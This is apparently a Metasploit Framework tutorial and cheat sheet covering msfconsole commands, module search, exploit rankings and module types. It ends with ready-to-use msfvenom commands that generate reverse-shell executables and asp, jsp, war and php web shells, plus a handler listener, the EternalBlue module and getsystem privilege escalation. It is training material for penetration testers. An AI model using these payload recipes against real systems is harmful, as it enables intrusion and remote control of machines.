Metasploit Framework

Description & Concepts

Free

Metasploit Framework is the free, open-source version of Metasploit, an exploitation framework.

Metasploit supports all phases of a penetration testing engagement, from information gathering to post-exploitation.

Concepts

There are three general concepts within the Metasploit framework:

Vulnerability: A design, coding, or logic flaw affecting the target system.
Exploit: A piece of code that uses a vulnerability present on the target system.
Payload: The code that will run on the target system (delivered by the exploit).

The Console

msfconsole starts the program and drops you off at a prompt: msf6 > (or msf5 >)
Almost any Linux command can be run from the msf6 prompt (e.g., ls, ping, clear, etc.

4 Main Activities

There are 4 main activities you will most always do when using Metasploit:

Start the console: command line msfconsole
- Review available options at the msf prompt with: ?.
Select an exploit: this will get you into the target…
- See a full list: show exploits
- Search: search [keyword]:[arg] [keyword]:[arg]
Select a payload: this is what you want to do once you're in…
- See a full list: show payloads
Run the exploit:
- Set any necessary options first (e.g., rhost)
- run your exploit

Help

help [command name] - Shows the help file for the command indicated.
history - See a list of commands you used (so you can then do a help [command] on the command you need help with).

Modules & Usage

Search for Module

search [parameters/keyword] - Search the Metasploit Framework database for modules relevant to the given search parameter/keyword.

You can conduct searches using CVE numbers, exploit names (eternalblue, heartbleed, etc.), or target system type.
Example, CVE: search ms17-101
Example, type: search type:auxiliary telnet

Alternative Search Option: Rapid7 maintains a searchable web-based exploit database. Find your exploit there and tell msf to use it.

info - To see more information on the loaded module. You can see info on any module at any time by using the command info followed by the full path the module you need info on.

Parameters (Keywords):

Keyword	Description
app	client or server attack
author	search by module author
bid	search by BugTrack ID
cve	search by CVE ID
edb	search by Exploit-DB ID
name	search by descriptive name
platform	search by platform (Windows, Linux, etc.)
ref	modules with a specific ref.
type	search by type (exploit, auxiliary, post)

Search Result Ranking

You want a Normal ranking or above. Command to filter exploits by ranking:

# search for exploits ranked great:
search -r great
# set the same filter globally:
setg MinimumRank great

Rank	Description source
Excellent	The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances (WMF Escape()).
Great	The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check.
Good	The exploit has a default target and it is the “common case” for this type of software (English, Windows 7 for a desktop app, 2012 for server, etc). Exploit does not auto-detect the target.
Normal	The exploit is otherwise reliable, but depends on a specific version that is not the “common case” for this type of software and can’t (or doesn’t) reliably autodetect.
Average	The exploit is generally unreliable or difficult to exploit, but has a success rate of 50% or more for common platforms.
Low	The exploit is nearly impossible to exploit (under 50% success rate) for common platforms.
Manual	The exploit is unstable or difficult to exploit and is basically a DoS (15% success rate or lower). This ranking is also used when the module has no use unless specifically configured by the user (e.g.: exploit/unix/webapp/php_eval).

Select Module to Use

use - Select a module to use. Follow use with the full path to the module you want to use or its number in your search result list. Example:

use exploit/windows/smb/ms17_010_eternalblue

# Results in a new, descriptive msf prompt
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >

back - Back out of (de-select, un-use) the module you just selected with use.

Set Options

show options or just options - Shows you the options of the loaded module that you can set.

show advanced or just advanced - Shows you the advanced options of the loaded module that you can set.

set [option name] [value] - Set the module options you need to set.

unset [option name or all] - Unset a specific module option or all of them.

setg - will set an option globally to be used by default in whatever module.

unsetg - will unset your global option.

Run Module

exploit or run - Launch the module.

Side note: the run command is an alias created for the exploit command because “exploit” did not make sense when using modules that were not exploits, like port scanners, vulnerability scanners, etc.
exploit -z (a nod to the Ctrl-z session key-binding) will put your newly created session into the background automagically.

Sessions: Once a vulnerability has been successfully exploited (with exploit or run) a session will be created. A session is the communication channel established between the target system and Metasploit.

background or Ctrl-z - at your session prompt (e.g. meterpreter >), this commando will send the session to the background (out of your way, so you will not be interacting with it).
sessions - lists out your current sessions
sessions -i [Id number] - pull a session from the background to the foreground to interact with it.

Modules & Categories

[1] Auxiliary

Any supporting module, such as scanners, crawlers and fuzzers. Found here:

/usr/share/metasploit-framework/modules/auxiliary

[2] Encoders

Allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them.

Encoders can have a limited success rate as antivirus solutions can perform additional checks.
Found here:

/usr/share/metasploit-framework/modules/encoders

[3] Evasion

Direct attempts to evade antivirus software.

Encoders will encode the payload and thus obfuscate the signature.
Evasion modules are an actual direct attempt to evade antivirus software.

/usr/share/metasploit-framework/modules/evasion

[4] Exploits

Modules that… well… exploit. Very neatly organized by target system here:

/usr/share/metasploit-framework/modules/exploits

[5] NOPs

NOPs (No OPeration) do nothing, literally.

They are often used as a buffer to achieve consistent payload sizes.

/usr/share/metasploit-framework/modules/nops

[6] Payloads

Payloads are codes that will run on the target system.

Exploits leverage a vulnerability to gain access on a target system, but to achieve our goal we need a payload.
Examples: get a shell, load malware, load a backdoor, run a command, etc.

/usr/share/metasploit-framework/modules/payloads

Payloads are split into three categories:

Singles: Self-contained payloads that do not need to download any additional component to run.
Stagers: Set up a connection channel between Metasploit and the target system.
- Useful when working with staged payloads.
- Staged payloads will first upload a stager on the target system then download the rest of the payload (in stages).
- This provides some advantages as the initial size of each stage will be relatively small compared to the full payload.
Stages: Downloaded by the stager. This will allow you to use larger sized payloads

Inline (single) vs. Staged Payloads:

An inline (single) payload will have a filename with the underline (_) separating the words.
- Example: generic/shell_reverse_tcp
The staged payload will separate the initial part of the filename into a subdir name (separating the initial part of the name is indicative of the separation of the payload into stages).
- Example: windows/x64/shell/reverse_tcp

[7] Post

Post modules are useful during the final, post-exploitation phase. Found here:

/usr/share/metasploit-framework/modules/post

Syntax (Examples)

Two Common Commands

After a successful exploit (and assuming your payload was Meterpreter), two common commands you will likely often want to try:

# priv esc to admin
getsystem

# get a shell in the exploit directory on the target
shell

msfvenom

See here.

MSF Handler

msfconsole…Handlers should be in the following format:

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>

Non-Meterpreter Binaries

Staged Payloads for Windows

# x86
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

# x64
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Stageless Payloads for Windows

# x86
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

# x64
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Staged Payloads for Linux

# x86
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

# x64
msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Stageless Payloads for Linux

# x86
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

# x64
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Non-Meterpreter Web Payloads

# asp 
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp

# jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

# war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

# php
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php

Meterpreter Binaries